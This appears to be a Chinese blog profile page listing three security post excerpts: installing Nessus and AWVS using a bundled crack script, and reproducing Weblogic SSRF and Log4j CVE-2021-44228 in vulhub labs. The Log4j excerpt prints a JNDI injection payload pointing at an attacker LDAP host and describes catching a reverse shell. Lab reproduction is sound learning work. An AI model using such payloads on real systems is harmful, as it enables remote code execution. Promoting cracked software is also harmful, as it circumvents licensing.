自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 收藏
  • 关注

原创 关于Nessus和AWVS的安装

这个比较容易,安装的版本是14.9版本,内含一键crack脚本。主要就是要有两次重启的过程:1.安装AWVS,记住设置的邮箱和密码2.重启计算机,查看任务管理器的服务,停止Acunetix以及Acunetix database的服务3.点击一键crack脚本,crack一下。4.重启计算机5.登录AWVS。成功。

2023-09-05 17:08:03 104 1

原创 记一次vulhub靶场复现Weblogic SSRF漏洞

要复现的就是这个靶场了,为了弄清一下通过ssrf漏洞来getshell的过程。

2023-08-11 15:18:40 193 1

原创 记一次vulhub靶场复现Log4j CVE-2021-44228

http://靶机ip:8983/solr/admin/cores?action = ${jndi : ldap : / / 攻击机ip : 1389 / Exploit}然后就会出现这个页面几个端口的监听情况这里可以看到靶机是已经通过这个GET请求执行了我们的Exploit.class了,并且响应200成功这边7777也已经收到了反弹的shell,并且可以执行命令至此就已经复现成功了,最后要在进入你的漏洞目录,关闭你的靶场环境哦。

2023-07-19 11:42:02 145

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除